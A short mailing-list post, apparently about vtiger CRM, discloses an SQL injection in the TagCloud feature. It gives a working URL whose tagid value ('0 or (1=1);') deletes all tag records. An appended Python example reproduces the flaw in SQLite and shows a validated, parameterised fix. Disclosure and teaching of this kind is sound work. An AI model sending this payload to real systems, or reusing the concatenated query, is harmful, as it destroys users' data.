SQL injection attack on tag cloud feature

Tim Smith-10
I noticed that the TagCloud PHP file did no checking on the tagid request variable.

You can delete all records in the tag tables by using this URL:
vtigercrm/index.php?file=TagCloud&module=Leads&action=LeadsAjax&ajxaction=DELETETAG&tagid=0%20or%20(1=1);

Tim
onwealdtim

_______________________________________________
Get started with creating presentations online - http://zohoshow.com?vt
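To make the post's observation concrete, here is an added example (not code from vtiger CRM or from the post's author) that reconstructs the pattern described: a DELETE statement built by concatenating the tagid request parameter, with the tag-cloud table reduced to a hypothetical two-column `tagged_objects` table in an in-memory SQLite database. The vtiger table and column names are not reproduced; the schema, the sample rows and the function names are assumptions. The fixed variant validates the parameter as a plain integer and binds it, which is what the original code was missing.

```python
import re
import sqlite3

# Constructed sample data: (tag_id, object_id). The table and columns are an
# assumption made for this example, not vtiger's real tag-cloud schema.
SAMPLE_ROWS = [(1, 101), (1, 102), (2, 201), (3, 301)]

# The payload from the post's URL, after URL-decoding "%20" to spaces.
PAYLOAD = "0 or (1=1);"


def fresh_db():
    """Create an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tagged_objects (tag_id INTEGER, object_id INTEGER)")
    conn.executemany("INSERT INTO tagged_objects VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def count_rows(conn):
    return conn.execute("SELECT COUNT(*) FROM tagged_objects").fetchone()[0]


def delete_tag_vulnerable(conn, tagid):
    """Hypothetical reconstruction of the unchecked handler: the request value
    is pasted straight into the statement, so "0 or (1=1)" turns a one-tag
    delete into a delete of every row. Returns the rows remaining."""
    sql = "DELETE FROM tagged_objects WHERE tag_id=" + tagid
    conn.execute(sql)
    conn.commit()
    return count_rows(conn)


def delete_tag_fixed(conn, tagid):
    """Hardened version: accept only a string of ASCII digits, then bind the
    integer as a parameter so the value can never alter the SQL. Returns the
    rows remaining, or raises ValueError for anything that is not an integer."""
    if re.fullmatch(r"[0-9]+", tagid) is None:
        raise ValueError("tagid must be a non-negative integer")
    conn.execute("DELETE FROM tagged_objects WHERE tag_id=?", (int(tagid),))
    conn.commit()
    return count_rows(conn)


def fixed_rejects(tagid):
    """True if the hardened handler refuses the given tagid without touching data."""
    conn = fresh_db()
    try:
        delete_tag_fixed(conn, tagid)
    except ValueError:
        return count_rows(conn) == len(SAMPLE_ROWS)
    return False


def run_demo():
    """Run both handlers against a legitimate tagid and against the payload.
    Returns (vulnerable_after_legit, vulnerable_after_payload,
             fixed_after_legit, fixed_rejected_payload)."""
    return (
        delete_tag_vulnerable(fresh_db(), "2"),      # only tag 2's row goes: 3 left
        delete_tag_vulnerable(fresh_db(), PAYLOAD),  # every row goes: 0 left
        delete_tag_fixed(fresh_db(), "2"),           # same legitimate result: 3 left
        fixed_rejects(PAYLOAD),                      # payload refused, table intact
    )


if __name__ == "__main__":
    print(run_demo())
```

The validate-then-bind combination matters: binding alone would already stop the injection, since a bound parameter is never parsed as SQL, but the explicit integer check also gives the handler a clear error path instead of silently deleting nothing when the parameter is garbage.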